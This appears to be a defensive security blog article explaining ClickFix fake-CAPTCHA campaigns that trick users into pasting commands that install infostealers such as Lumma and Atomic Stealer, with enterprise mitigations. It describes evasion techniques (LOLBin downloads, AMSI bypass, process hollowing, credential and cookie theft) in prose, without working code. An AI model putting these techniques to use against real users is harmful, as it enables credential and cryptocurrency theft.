In an era dominated by digital convenience and browser security mechanisms, threat actors have found a way to weaponize familiar trust interfaces. The fake CAPTCHA scam—often delivered via ClickFix campaigns—tricks users into executing malicious code, bypassing traditional web defenses.
Online security checks are designed to protect users from automated bots and malicious actors, but cybercriminals have found a way to weaponize these familiar interfaces. A rising social engineering threat known as the fake CAPTCHA scam—often distributed through ClickFix campaigns—mimics legitimate verification screens to compromise devices. By exploiting the user's trust and verification fatigue, attackers trick victims into executing malicious payloads themselves, bypassing browser-based security filters. Legitimate verification systems operate inside sandbox boundaries, but fake prompts seek to break out of the browser by requesting manual OS interactions.
This sophisticated campaign represents a significant shift in the tactics of modern info-stealers. Historically, malware relied on software exploits or malicious downloads hidden behind email attachments. With fake CAPTCHA scams, threat actors rely on human-assisted execution to run obfuscated scripts. The victim is instructed to copy a command to their clipboard and paste it into their system's Run dialog or Terminal to "verify" their identity. Because this execution is initiated by the user, the operating system treats it as an authorized administrative action.
Once executed, these commands download powerful infostealers like Lumma Stealer and Rhadamanthys, which harvest saved passwords, session cookies, and cryptocurrency wallets. The scale of this campaign is staggering, with security firms detecting hundreds of thousands of infections worldwide. The success of this tactic lies in its ability to exploit built-in operating system utilities, making the malicious activity appear legitimate to security software. The fileless nature of the initial download makes detection highly difficult for signature-based antivirus scanners.
To protect individuals and organizations, it is critical to understand the mechanics of this social engineering campaign, the payloads it delivers, and the mitigation strategies available. Analyzing the difference in tactics between Windows and macOS targets reveals the adaptability of modern threat actors, showing that user education is our most vital defense.
Legitimate security checks never require users to execute shell scripts or paste commands into operating system terminals.
- Social Engineering Vector: ClickFix campaigns present users with fake Cloudflare or ReCAPTCHA verification panels that copy malicious payloads.
- Execution Mechanics: Victims are socially engineered to press Windows+R, paste the clipboard content, and hit Enter, running scripts manually.
- Malware Payloads: Executing the PowerShell script installs infostealers like Lumma Stealer or Rhadamanthys, harvesting session tokens and browser credentials.
- Dark Web Economy: Lumma Stealer is distributed under a Malware-as-a-Service model, with entry-tier subscriptions costing $250 per month.
- macOS Targeting: The campaign has adapted to macOS, directing users to paste curl scripts into the Terminal to bypass Gatekeeper.
The Deceptive Verification: How Fake CAPTCHAs Hijack the Clipboard
The infection chain begins when a user visits a compromised website or clicks a malicious advertisement. These pages are often distributed through search engine optimization poisoning, targeting users looking for cracked software, media players, or browser extensions. Upon loading the page, the user is blocked by a screen that mimics legitimate services like Cloudflare or Google ReCAPTCHA, displaying a "Verify you are human" prompt. This prompt is designed to create urgency and exploit the user's habit of clicking through security checks.
When the user clicks the "Verify" button, a malicious JavaScript script runs silently in the background, copying an obfuscated command to the system's clipboard. The website then displays a set of instructions, explaining that a temporary verification process is required to proceed. The user is instructed to press a key combination—typically Windows Key + R—paste the contents of the clipboard using Ctrl + V, and press Enter. The site uses detailed visual animations to guide the user through this process, minimizing suspicion.
To identify these fake prompts, users should look out for several key indicators of a clipboard attack:
- Manual Execution Request: Prompts asking you to press system hotkeys like Windows+R or launch Terminal.
- Clipboard Interaction: Buttons that silently copy code to your clipboard instead of resolving a challenge.
- Deceptive Domain Names: Web addresses that mimic legitimate security providers but feature spelling errors.
Because legitimate CAPTCHAs never require manual command execution, this prompt is a major red flag. However, many users, accustomed to clicking through security warnings, follow the steps without realizing they are running code. The script copied to the clipboard is a heavily encoded PowerShell command designed to launch the next stage of the attack. By involving the user, attackers bypass browser warnings that flag executable file downloads.
Clipboard hijacking allows attackers to bridge the gap between the web browser and the operating system. By convincing the user to manually copy and paste the payload, the malware avoids browser security controls that block automatic file downloads, making it a highly successful delivery vector.
The Windows Infection Chain: PowerShell, Lolbins, and Memory Injection
On Windows devices, the fake CAPTCHA scam relies on PowerShell to execute the malicious script and download the final payload. When the user pastes the command into the Run dialog, the system launches PowerShell with the user's current privileges. The pasted script is typically a long, single-line command containing obfuscated code designed to bypass the Antimalware Scan Interface (AMSI). This obfuscation prevents simple script scanners from identifying the malicious download links embedded within the command.
The script uses living-off-the-land binaries (Lolbins)—built-in Windows tools that are trusted by default—to download and run the malware. By abusing legitimate utilities like `mshta.exe` or `certutil.exe`, the command can connect to a remote command-and-control server without triggering security alerts. The script downloads a secondary payload, which is often a heavily obfuscated dynamic link library (DLL) or executable file. This file represents the primary loader module of the info-stealer.
The secondary execution phase utilizes specific scripting methodologies to ensure high stealth on the target host:
- Base64 Obfuscation: Encoded command strings that hide download URLs from static security checkers.
- In-Memory Execution: Loading malicious dynamic link libraries (DLLs) directly into RAM via hollowed processes.
- Defender Disabling: Commands designed to turn off local system antivirus components if run as administrator.
The secondary payload then executes in the system's memory, using techniques like process hollowing to inject the malware into a legitimate system process. By running in memory rather than writing files to the disk, the malware minimizes its footprint and evades detection by basic antivirus scanners. This fileless execution model allows the info-stealer to operate quietly in the background while harvesting sensitive data. Security teams must monitor memory allocation anomalies to detect this presence.
The use of PowerShell also allows the script to disable local security controls or clear event logs, hindering forensic investigation. If the user is logged in with administrative privileges, the script can modify registry settings, add persistent registry keys, or disable Windows Defender. This access level makes it critical for organizations to enforce least-privilege access and restrict scripting privileges for all non-administrative accounts inside the corporate network.
Understanding this infection chain reveals why traditional, signature-based defenses are often ineffective against ClickFix campaigns. The attack does not rely on a known exploit, but rather on the legitimate behavior of built-in system tools driven by the user. Defending against these attacks requires behavior-based detection tools that can identify suspicious PowerShell execution patterns and unauthorized clipboard access, warning users of potential danger before the script launches.
Context: Living-off-the-Land (LotL) attacks represent a method where threat actors abuse pre-installed, legitimate system utilities (like PowerShell or Terminal) to download and run malware. Because these utilities are trusted by the operating system, their execution rarely triggers default security warnings, shifting the burden of detection to behavioral monitoring tools.
Expanding the Target: ClickFix Tactics Targeting macOS Terminal
While ClickFix campaigns initially focused on Windows users, threat actors have expanded their tactics to target macOS systems. The macOS version of the fake CAPTCHA scam follows a similar social engineering logic but adapts the instructions for Apple's operating system. When a macOS user visits a compromised page, they are presented with a prompt asking them to copy a Terminal command. The graphic interface is styled to resemble an official Apple security check, building instant trust.
The instructions direct the user to open the Terminal utility using Spotlight Search, paste the copied string, and press Enter. This command is typically a shell script that downloads a malicious package containing macOS-specific infostealers, such as Atomic Stealer or MacSync. Once executed, the script prompts the user for their system password to install the payload. By entering their password, the user grants the script administrative privileges, allowing it to modify system files.
The execution of the Terminal command allows the malware to bypass macOS Gatekeeper, a security feature designed to block unsigned software from running. Because the user manually pasted the script into the Terminal, macOS treats the command as authorized, permitting the download and installation of the stealer. This tactic demonstrates that non-Windows platforms are equally vulnerable to clipboard-based attacks, proving that platform security is only as strong as user vigilance.
Once installed, the macOS infostealer targets the system Keychain, which stores saved passwords, secure notes, and encryption keys. The malware also scans browser profiles to extract cookies, autofill data, and cryptocurrency wallet files. The harvested data is compressed and exfiltrated to the attacker's server, allowing them to bypass multi-factor authentication (MFA) using stolen session tokens. This allows attackers to compromise corporate accounts even without knowing the primary password.
The adaptation of ClickFix for macOS highlights the cross-platform nature of modern cyber threats. Attackers recognize that many users assume macOS is immune to malware, making them less cautious when presented with unusual Terminal prompts. Educating Apple users that legitimate websites will never ask them to paste commands into the Terminal is essential for stopping this campaign, showing that user education must be updated to cover all operating environments.
“The genius of ClickFix is that it doesn't exploit code; it exploits human trust. By mimicking a security verification step, it tricks the user into becoming the loader, rendering traditional browser sandboxes completely ineffective.”
— Security Research Team, SentinelOne Security Advisory, May 2026
Inside Lumma Stealer: Subscription Economics and Harvested Data
The primary payload delivered by fake CAPTCHA scams is Lumma Stealer, a prominent "Malware-as-a-Service" (MaaS) infostealer sold on dark web forums and Telegram channels. Lumma operates on a tiered subscription model, with monthly prices starting at $250 for standard access. Higher-tier subscriptions, which can cost up to $20,000, provide access to the source code, allowing buyers to act as resellers. This commercial structure lower the barrier to entry for aspiring cybercriminals.
Lumma Stealer is designed to be highly efficient and stealthy, targeting a wide range of sensitive data on the victim's device. The malware dynamically locates and extracts data from over 10 popular web browsers, including Google Chrome, Mozilla Firefox, Microsoft Edge, and Brave. It targets browser-stored credentials, credit card numbers, autofill forms, and search histories, packaging the data into structured zip archives for exfiltration back to the C2 panel.
In addition to browser data, Lumma Stealer targets cryptocurrency assets, scanning the device for over 70 popular wallet extensions and desktop applications. It extracts wallet configuration files, private keys, and seed phrases, allowing attackers to drain funds from the victim's account. This focus on crypto assets makes the stealer highly profitable for threat actors, as they can instantly monetize the infection without needing to resell credentials.
To examine the typical configuration of standard info-stealers in 2026, security analysts compare their parameters:
- Lumma Stealer: Standard monthly price is $250; targets 10+ browsers and 70+ crypto wallet extensions.
- Rhadamanthys: Sophisticated modular stealer costing $160/month; features advanced memory evasion capabilities.
- Atomic Stealer: Dedicated macOS stealer costing $1,000/month; targets system Keychain and Apple browser profiles.
- RedLine: Legacy stealer now declining due to developer leaks; relies on static signature files.
The malware also harvests session cookies to bypass multi-factor authentication (MFA). By stealing active browser session cookies, attackers can clone the victim's active session and gain direct account access without needing passwords or 2FA codes, completely undermining traditional perimeter security defenses.
The scale of Lumma's operations is immense, with researchers identifying over 394,000 global infections between March and May 2025. In late 2024, Lumma accounted for over 50% of all stealer logs sold on the Russian dark web, demonstrating its dominance in the credential exfiltration market.
The economics of Lumma Stealer create a self-sustaining cycle of cybercrime. The low barrier to entry of a $250 subscription allows novice criminals to launch campaigns. The profits generated fund further malware updates, ensuring info-stealers remain a persistent global threat, requiring coordinated responses from security providers.
“Legitimate security checks will never ask you to open your Run dialog, paste scripts, or launch Terminal utilities. If a website requires manual command execution to prove you are human, close it immediately.”
— Consumer Protection Advisory, Federal Trade Commission (FTC), June 2026
Enterprise Mitigation: Defending Against Clipboard Social Engineering
Defending against fake CAPTCHA scams requires a multi-layered security strategy that combines user training with technical controls. Because the attack relies on the user executing the command, educating employees about this tactic is the first line of defense. Security awareness programs should emphasize that legitimate websites will never require users to copy and paste code to verify their identity, helping users identify fake prompts before they interact with them.
To establish a robust defensive posture, security administrators should implement a structured mitigation pathway:
- Group Policy Restriction: Restrict PowerShell execution policies using Group Policy Objects or Intune to prevent unsigned script execution.
- Endpoint Hardening: Disable the Windows Run dialog (`Win+R`) and restrict standard user privileges to block administrative command execution.
- Behavioral Monitoring: Configure EDR rules to flag suspicious clipboard modifications and detect Lolbin processes calling remote servers.
From a technical perspective, organizations should restrict PowerShell execution policies using Group Policy Objects or Microsoft Intune. By limiting the ability of standard users to run PowerShell scripts, administrators can block the infection chain even if an employee falls for the scam. Disabling the Run dialog (`Windows Key + R`) for non-administrative users can also mitigate the risk, preventing the initial script insertion from launching the default shell environment.
Endpoint Detection and Response (EDR) tools should be configured to monitor for suspicious PowerShell command lines, especially those containing obfuscated strings, Base64 encoding, or references to known Lolbins. Monitoring for unauthorized clipboard activity and clipboard history modifications can also help detect hijacking attempts before the command is executed, alerting security teams of a potential compromise in real time.
Finally, implementing a robust credential management policy can limit the impact of a successful infection. Encouraging the use of dedicated password managers rather than browser-based storage makes it harder for info-stealers to harvest credentials. Using hardware-bound multi-factor authentication (MFA), such as security keys, can protect accounts even if session cookies are stolen, preventing unauthorized access to critical corporate resources.
| Malware Family | Primary OS Target | Lumma C2 Log Market Share | Risk Status Badge |
|---|---|---|---|
| Lumma Stealer | Windows / macOS | 52% (November 2024) | ▲ Leading |
| Rhadamanthys | Windows | 20% (November 2024) | ≈ Parity |
| Atomic Stealer | macOS | 12% (November 2024) | ≈ Parity |
| RedLine | Windows | 6% (November 2024) | ▼ Behind |
Conclusion: The Evolution of Clipboard-Based Attacks
The fake CAPTCHA scam represents a sophisticated evolution in social engineering, combining familiar security interfaces with clipboard hijacking to bypass traditional defenses. The success of ClickFix campaigns and the widespread distribution of Lumma Stealer highlight the need for organizations and individuals to remain vigilant. By combining user education with strict technical controls like PowerShell restrictions and EDR monitoring, we can protect our systems from these deceptive tactics and ensure our data remains secure, stopping info-stealers at the doorstep.
Sources and References
- Federal Trade Commission (FTC) - Consumer Advice on Spotting CAPTCHA Scams (Published June 8, 2026): ftc.gov
- SentinelOne - Behavioral Threat Advisory on ClickFix Clipboard Injection Techniques: sentinelone.com
- Microsoft Threat Intelligence Center (MSTIC) - LummaC2 Stealer Infection and MaaS Metrics: microsoft.com
- Proofpoint - Threat Research on Social Engineering Trends and Human-Assisted Loader Campaigns: proofpoint.com
Post a Comment